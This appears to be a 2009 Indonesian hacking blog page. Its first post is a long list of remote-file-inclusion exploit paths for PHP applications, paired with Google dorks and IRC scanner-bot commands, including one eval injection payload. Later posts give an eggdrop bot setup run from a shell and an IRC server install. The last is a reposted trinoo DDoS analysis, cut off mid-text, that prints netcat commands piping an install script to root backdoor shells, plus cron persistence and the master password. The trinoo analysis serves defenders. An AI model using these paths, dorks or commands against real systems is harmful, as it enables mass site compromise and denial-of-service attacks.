bug dork

Close
Snap Shares for charity
revoTeaM Site
Nothing Perfect Humans in The Worlds

* History

bug dorks for scaner

* 09/04/2009 – 6:31 pm
* Ditulis dalam tips and trik
* Tinggalkan sebuah Komentar

Exploits Bug Dork For Scanner.

docs/front-end-demo/cart2.php?workdir= “inurl%3A%22aLogIn.php%22″
docs/front-end-demo/cart2.php?workdir= inurl:hosting.php?spt=
/bemarket/postscript/postscript.php?p_mode= /bemarket/
index.php?mode= inurl:”*.php?mode=join” friend
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root= inurl:/modules/icontent
modules/coppermine/themes/default/theme.php?THEME_DIR= Powered By Coppermine Photo Gallery v1.2.2b
/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan modify.php?dir_module= allinurl%3Axfsection+site%3Ajp
/modules/userstop/userstop.php?exbb[home_path]= Powered by ExBB
index.php?page= allinurl%3Aindex.php%3Fpagedb%3D
contenido/external/frontend/news.php?cfg[path][includes]= cms/front_content.php?idcat=
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo” site:gov
includes/include_once.php?include_file= allinurl%3A%2Fproduct_info.php%3Fcust_id%3D”
mygallerybrowser.php?myPath= inurl:%22/mygallery/myfunctions/%22
admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir= “LimeSurvey”
admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/Root.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/File.php?homedir= “LimeSurvey”
phpbb/sendmsg.php?phpbb_root_path= “Flashbb”
PPPoE/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1″
library/authorize.php?login_form= “PhpHostBot”
historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
index.php?page= inurl:index.php%”Submit%Articles”%”Member%Login”%”Top%Authors”
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= “Nuke ET Copyright � 2004 por Truzone.”
modules/admin/vw_usr_roles.php?baseDir= “dotProject logo”
modules/Forums/admin/admin_users.php?phpbb_root_path= %22modules.php%3Fname%3DForums%22
@scan 1000 includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]= “Powered+by+CubeCart+3.0.0″
eva/imprim.php3?aide= “Eva-Web”
index.php?s= index.php?s=
!scan index.php?a= index.php?a=
/xcart/config.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=cart
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=pages
/ws/get_events.php?includedir= WebCalendar
agenda2.php3?rootagenda= phpmyagenda
modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= inurl:”vwar”
/templates/tmpl_dfl/scripts/index.php?dir[inc]= “Powered by : Dolphin Web Community Software”
admin/business_inc/saveserver.php?thisdir= Confixx Professional
protection.php?action=logout&siteurl= PHPFanBase
modify.php?dir_module= allinurl%3Axfsection
classes/phpmailer/class.cs_phpmailer.php?classes_dir= inurl:cs-cart
!scan wp-pass.php?_wp_http_referer= “powered by wordpress”
.scan index.php?abs_path= index.php?action=viewcart
/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
index.php?func= “Powered by FlashGameScript”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]= inurl:”sohoadmin”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= inurl:”index.php?pr=Services”
/include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site= “Punktesystem Pro”
ws/login.php?noSet=0&includedir= “WebCalendar”
!scan login.php?svr_rootscript= allinurl:order?page=plan_show
modules/MDForum/includes/functions_admin.php?phpbb_root_path= “powered by MDForum”
/newsboard//admin/addons/archive/archive.php?adminfolder= “/newsboard/”
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= “/vwar/”
anguage/lang_german/lang_main_album.php?phpbb_root_path= phpbbplus
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “.uk/index.php”+”option”
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:br
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:il
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= com_frontpage site:my
eva/index.php3?aide= “Eva-Web”
/vwar/convert/mvcw.php?step=1&vwar_root= vwar
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenuXL
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenu”
/photo_comment.php?toroot= �Exhibit Engine 1.5 RC 4″
protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
/accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “powered by boonex”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “netcat require”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “powered by CMS Made Simple version”
includes/include_once.php?include_file= create_account.php?PHPSESSID=
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= “Powered By Zen Cart”
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= Copyright � 2003-2006 Zen Cart
/inc/header.php/step_one.php?server_inc= step_one.php?sid
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_joomap
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_jpgraph
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_letterman
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_swmenufree
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_bsq_sitestats
components/com_livechat/livechat.html.php?mosConfig_absolute_path= com_livechat
components/com_mypms/class.mypms.php?mosConfig_absolute_path= com_mypms
/admin/classes/TplLoad.php?full_path_to_public_program= /TplLoad.php/
/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act= /kboard.php?board=
/index.php?abg_path= Africa Be Gone
errors.php?error= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact=
/LightTwoOh/sidebar.php?loadpage= phpAutoVide

/com_joomnik/admin.joomnik.html.php?mosConfig_absolute_path= com_joomnik
/com_joomlaflashfun/admin.joomlaflashfun.php?= com_joomlaflashfun
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= com_admin
/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop
/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= com_lurm_constructor
!scan tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4
!scan modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= xoopsgallery
!scan /config.inc.php?path_escape= XZero Community Classified
!scan /php121adminconfig.php?mosConfig_absolute_path= PHP121
!scan /common/db.php?commonpath= “samPHPweb”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_rss

path/bridge/yabbse.inc.php?sourcedir= Coppermine Photo Gallery
!scan /lib/functions.php?DOC_ROOT= intitle:”OFFL – Login”
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= “/index.php?option=com_joomlaradiov5″

calogic/clmcpreload.php?CLPATH= calogic
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= modules.php?name=
modifyform.html?code= modifyform.html?*=*
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_frontpage
# com_jce # NEW BUG SECURITY PHP 9/15/07 10:05 pm
# com_jim # NEW BUG SECURITY PHP 9/15/07 9:12 pm
# com_jreactions # NEW BUG SECURITY PHP 9/15/07 8:56 pm
# com_neoreferences # NEW BUG SECURITY PHP 9/15/07 8:
# com_quran # NEW BUG SECURITY PHP 9/15/07 7:49 pm
# com_datsogallery # NEW BUG SECURITY PHP 9/15/07 7:47 pm
# com_ricettario # NEW BUG SECURITY PHP 9/15/07 7:38 pm
# com_ab_calendar # NEW BUG SECURITY PHP 9/15/07 7:14 p
# com_joomlalib # NEW BUG SECURITY PHP 9/15/07 6:27 pm

/language/lang_german/lang_main_album.php?phpbb_root_path=
“Powered by phpBB2 Plus”
!scan administrator/components/com_jreactions/langset.php?comPath= Joomla J! Reactions
!scan language/lang_english/lang_main_album.php?phpbb_root_path= phpbb inurl:album.php site:uk
!scan /rconfig.inc.php?config[root_dir]= amember Pro / amember
Solo @rfi /language/lang_english/lang_main_album.php?phpbb_root_path= “Powered by phpBB2 Plus”
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_frontpage
components/com_datsogallery/datsogallery.php?mosConfig_absolute_path= com_frontpage
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_frontpage
mcconfig.php?CLPATH= calogic Philip Boone
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_sobi2
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_acajoom
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= “.tr./components” “.tr./components”
components/com_contxtd/contxtd.class.php?mosConfig_absolute_path= com_contxtd
administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path= components/com_blastchatc/blastchatc.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=
administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path= com_uddeim

components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= com_rwcards
administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path= com_rwcards
mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT= “Powered by SocketMail”
modules/Forums/favorites.php?nuke_bb_root_path= Powered by Platinum 7.6.b.5
!scan administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path= com_chronocontact
includes/include_once.php?include_file= Click to View Our Catalog
rconfig.inc.php?config[root_dir]= aMember PRO
index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
/components/com_joomlalib/standalone/stubjambo.php?baseDir= com_performs
!scan /_theme/breadcrumb.php?rootBase= “!new Female Celebrities”
urlinn_includes/config.php?dir_ws= put a copy/past from URL
/_inc/config.php?rootBase= “! Hide Your Friends & Comments”
!scan includes/functions_admin.php?phpbb_root_path= pNphpBB2
tiny_includes/config.php?dir_ws= put a copy/past from URL
/_theme/_siteColors.php?rootBase= ‘page generated in’ time?
!alls index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
!alls index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path= com_joomlaxplorer
com_neolegal | com_dfcontact | com_massmail | com_syndicate |com_categories |com_newsfeeds | com_banners |
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= 2004 Miro International Pty Ltd.
administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path= com_chronocontact
=============================
administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=
administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.php?mosConfig_absolute_path=
administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=
components/com_utchat/utchat.php?mosConfig_absolute_path=
components/com_google_maps/google_maps.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= com_peoplebook
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= webshop
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= CubeCart
/tools/send_reminders.php?includedir= day.php?date=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage
config/config_admin.php?INC= “Your Search Starts Here”
config_member.php?INC= “Your Search Starts Here”
config/config_member.php?INC= “Your Search Starts Here”
membuat bot eggdrop

* 03/04/2009 – 7:33 pm
* Ditulis dalam Tutor
* Tinggalkan sebuah Komentar

Langkah2 membuat Bot Eggdrop:

Sebelumnya anda pastikan dulu ingin di load dimana botnya, disini ada 2 server yg bisa digunakan. Irc.Allnetwork.Org & Irc.Byroe.Net. Setelah itu siapkan Shell dan langsung saja masukan semua comand ini ke dalam shell, tunggu botnya masuk kedalam chan km. Selamat Mencoba

### Irc.Allnetwork.Org ###

1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/jongke_city/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada

8. cd scripts
9. wget geocities.com/jongke_city/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]

### Irc.Byroe.Net ###

1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/script_help/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada

8. cd scripts
9. wget geocities.com/script_help/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]

Thx For ROZI my Owner
INSTAL IRCD

* 01/04/2009 – 8:08 pm
* Ditulis dalam Tutor
* Tinggalkan sebuah Komentar

Anda pasti pernah dengar tentang Ircd? yang identik dengan server & networks. Untuk yang baru pertama kali instal ircd mungkin agak membingungkan dan terkadang sering eror pada bagian akhirnya. Disini akan di jelaskan bagaimana langkah – langkahnya dan bagaimana cara mengatasi masalahnya. Lets Go On Guys… :)

Pertama – tama siapkan shell yang dari linux maupun freeBSD, perbedaanya cuma pemakaian commands`nya. Tentunya banyak yang sudah tau, ya khan? :P

Selanjutnya kita buka shell & buat directoy dahulu untuk menaruh file ircdnya, dan sebelumnya cek dulu dimana posisi directory kita:

pwd

/home/estrada

mkdir solo

nb: solo <= contoh nama directory baru, tempat kita menyimpan file.

Setelah itu kita tinggal masuk ke directory baru kita dan mengexsesekusinya:

1. cd /solo

2. wget http://bdd.exolia.net/serveurs/Unreal3.2.7.tar.gz
3. tar -zxvf Unreal3.2.7.tar.gz
4. cd Unreal3.2.7
5. ./Config

Kalau ada konfirmasi meminta -[ Enter]- Anda tekan Enter aja terus sampai menunjukan 100%.

6. make

Setelah di make anda edit dulu configurasi dari unrealircd.conf, connect.conf, oper.conf, ircd.mtod nya. Untuk Linux gunakan “vi” Sedangkan untuk FreeBSD bisa digunakan “pico” untuk mengedit configurasinya, tergantung support tidaknya. untuk menyimpan file yang telah di edit gunakan comand “Esc + :wq + enter”.

vi unrealircd.conf
vi connect.conf
vi oper.conf
vi ircd.motd

Setelah semua selesai di edit configurasinya exsekusi dengan :
7. make install
8. ./unreal start

Nah selesai sudah, sekarang anda memiliki server sendiri. :P

Cukup sekian dulu penjelasanya, kalau ada yg perlu ditanyakan saran dan kritik akan kami terima dengan lapang dada. :)

NB: Untuk contoh unrealircd.conf, connect.conf, oper.conf anda bisa lihat di kategori IRCD.

Thanks Regard To :

Dj-RuFfy – NOGGLENK – ROZI And Sekip Crew – Cavalera And Habbat Crew.

Irc.Mildnet.Org Crew

Irc.Allindo.Net Crew

Irc.Indoirc.Net Crew

Irc.Byroe.Net Crew
trinoo.analysis

* 01/04/2009 – 6:59 pm
* Ditulis dalam hacking
* Tinggalkan sebuah Komentar

==========================================================================

The DoS Project's "trinoo" distributed denial of service attack tool

==========================================================================

David Dittrich
University of Washington
Copyright 1999. All rights reserved.
October 21, 1999

Introduction
------------

The following is an analysis of the DoS Project's "trinoo" (a.k.a.
"trin00") master/slave programs, which implement a distributed
network denial of service tool.

Trinoo daemons were originally found in binary form on a number of
Solaris 2.x systems, which were identified as having been compromised
by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". These attacks are described in CERT
Incident Note 99-04:

http://www.cert.org/incident_notes/IN-99-04.html

The trinoo daemons were originally believed to be UDP based,
access-restricted remote command shells, possibly used in conjunction
with sniffers to automate recovering sniffer logs.

During investigation of these intrusions, the installation of a trinoo
network was caught in the act and the trinoo source code was obtained
from the account used to cache the intruders' tools and log files.
This analysis was done using this recovered source code.

Modification of the source code would change any of the details
in this analysis, such as prompts, passwords, commands, TCP/UDP port
numbers, or supported attack methods, signatures, and features.

The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0
systems. The master was compiled and run on Red Hat Linux 6.0. It is
believed that both master and daemon have been witnessed "in the
wild" on these same platforms.

Trinoo networks are probably being set up on hundreds, perhaps
thousands, of systems on the Internet that are being compromised by
remote buffer overrun exploitation. Access to these systems is
probably being perpetuated by the installation of multiple "back
doors" along with the trinoo daemons.

A trinoo network of at least 227 systems -- 114 of these at Internet2
sites -- was used on August 17, 1999 to flood a single system at the
University of Minnessota, swamping the target network and rendering it
unusable for over two days. While responding to this attack, large
flows were also noticed going to at least sixteen other systems, some
outside the US. (See Appendix D for a report of part of this trinoo
attack.)

Attack scenario
---------------

A typical installation might go something like this.

1). A stolen account is set up as a repository for pre-compiled
versions of scanning tools, attack (i.e. buffer overrun exploit)
tools, root kits and sniffers, trinoo daemon and master programs,
lists of vulnerable hosts and previously compromised hosts, etc. This
would normally be a large system with many users, one with little
administrative oversight, and on a high-bandwidth connection for rapid
file transfer.

2). A scan is performed of large ranges of network blocks to identify
potential targets. Targets would include systems running various
services known to have remotely exploitable buffer overflow security
bugs, such as wu-ftpd, RPC services for "cmsd", "statd",
"ttdbserverd", "amd", etc. Operating systems being targeted appear to
be primarily Sun Solaris 2.x and Linux (due to the ready availability
of network sniffers and "root kits" for concealing back doors, etc.),
but stolen accounts on any architecture can be used for caching tools
and log files.

3). A list of vulnerable systems is then used to create a script that
performs the exploit, sets up a command shell running under the root
account that listens on a TCP port (commonly 1524/tcp, the
"ingreslock" service port), and connects to this port to confirm the
success of the exploit. In some cases, an electronic mail message is
sent to an account at a free web based email service to confirm which
systems have been compromised.

The result is a list of "owned" systems ready for setting up
back doors, sniffers, or the trinoo daemons or masters.

4). From this list of compromised systems, subsets with the desired
architecture are chosen for the trinoo network. Pre-compiled binaries
of the trinoo daemon are created and stored on a stolen account
somewhere on the Internet.

5). A script is then run which takes this list of "owned" systems and
produces yet another script to automate the installation process,
running each installation in the background for maximum multitasking.

This script uses "netcat" ("nc") to pipe a shell script to the root
shell listening on, in this case, port 1524/tcp:

---------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
. . .
---------------------------------------------------------------------------

The script "trin.sh", whose output is being piped to these systems,
looks like:

---------------------------------------------------------------------------
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
---------------------------------------------------------------------------

Depending on how closely crontab files are monitored, or if they are
used at all, this may be detected easily. If cron is not used at all
by this user (usually root), it may not be detected at all.

Another method was witnessed on at least one other system, where the
daemon was named "xterm", and was started using a script (named "c" on
the system on which it was found) that contains:

---------------------------------------------------------------------------
cd /var/adm/.1
PATH=.:$PATH
export PATH
xterm 1>/dev/null 2>&1
---------------------------------------------------------------------------

This would supposedly imply a method of running this script on demand
to set up the trinoo network.

Even more subtle ways of having trinoo daemons/masters lie in wait for
execution at a given time are easy to envision (e.g., UDP or ICMP
based client/server shells, such as LOKI (see Appendix C) , programs
that wake up periodically and open a listening TCP or UDP port, etc.)

The result of this automation is the ability for attackers to set up
the denial of service network, on widely dispersed systems whose true
owners don't even know are out of their control, in a very short time
frame.

6). Optionally, a "root kit" is installed on the system to hide the
presence of programs, files, and network connections. This is more
important on the master system, since these systems are key to the
trinoo network. (It should be noted that in many cases, masters have
been set up on Internet Service Providers' primary name server hosts,
which would normally have extremely high packet traffic and large
numbers of TCP and UDP connections, which would effectively hide any
trinoo related traffic or activity, and would likely not be detected.
(The fact that these are primary name servers would also tend to make
the owners less likely to take the system off the Internet when
reports begin to come in about suspected denial of service related
activity.)

Root kits would also be used on systems running sniffers that, along
with programs like "hunt" (TCP/IP session hijacking tool) are used to
burrow further into other networks directly, rather than through
remote buffer overrun exploits (e.g., to find sites to set up new file
repositories, etc.)

For more on "root kits" and some ways to get around them, see:

http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq

The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
------------------------------------------------------------

The trinoo network is made up of a master server ("master.c") and the
trinoo daemon ("ns.c"). A trinoo network would look like this:

+----------+ +----------+
| attacker | | attacker |
+----------+ +----------+
| |
. . . --+------+---------------+------+----------------+-- . . .
| | |
| | |
+----------+ +----------+ +----------+
| master | | master | | master |
+----------+ +----------+ +----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
| | | | |
| | | | |
+--------+ +--------+ +--------+ +--------+ +--------+
| daemon | | daemon | | daemon | | daemon | | daemon |
+--------+ +--------+ +--------+ +--------+ +--------+

The attacker(s) control one or more "master" servers, each of which
can control many "daemons" (known in the code as "Bcast", or
"broadcast" hosts.) The daemons are all instructed to coordinate a
packet based attack against one or more victim systems.

All that is then needed is the ability to establish a TCP connection
to the master hosts using "telnet" and the password to the master
server to be able to wage massive, coordinated, denial of service
attacks.

Communication ports
-------------------

Attacker to Master(s): 27665/tcp
Master to daemon(s): 27444/udp
Daemon to Master(s): 31335/udp

Remote control of the trinoo master is accomplished via a TCP
connection to port 27665/tcp. After connecting, the user must give
the proper password ("betaalmostdone"). If